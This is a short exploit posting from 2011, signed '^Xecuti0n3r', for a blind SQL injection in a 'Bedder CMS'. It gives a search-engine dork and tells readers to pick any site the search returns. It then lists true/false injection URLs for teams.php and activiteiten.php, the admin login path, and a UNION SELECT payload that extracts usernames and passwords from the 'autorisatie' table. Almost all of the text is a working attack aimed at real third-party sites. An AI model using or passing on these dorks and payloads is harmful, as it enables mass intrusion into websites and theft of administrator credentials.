#(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability#(+)Author : ^Xecuti0n3r#(+) Date: 15.04.2011#(+) Hour: 13:37 PM#(+) E-mail:xecuti0n3r()yahoo.com#(+) dork: intext:"Design by Bedder"#(+) Category: Web Apps [Blind SQli]
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork intext:"Design by Bedder"in search engine
*Blind SQL injection Vulnerability*# [+]True : http://site.com/teams.php?id=1 and 1=1--# [+]False: http://site.com/teams.php?id=1 and 1=2--# [+]eViL : http://site.com/teams.php?id=[SQLi]# [+]True : http://site.com/activiteiten.php?id=91 and 1=1--# [+]False: http://site.com/activiteiten.php?id=91 and 1=2--# [+]eViL : http://site.com/activiteiten.php?id=[SQLi]# [+]Cms Login Page is at : http://site.com/cms/index.php#[+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie
____________________________________________________________________
____________________________________________________________________
########################################################################(+)Exploit Coded by:^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################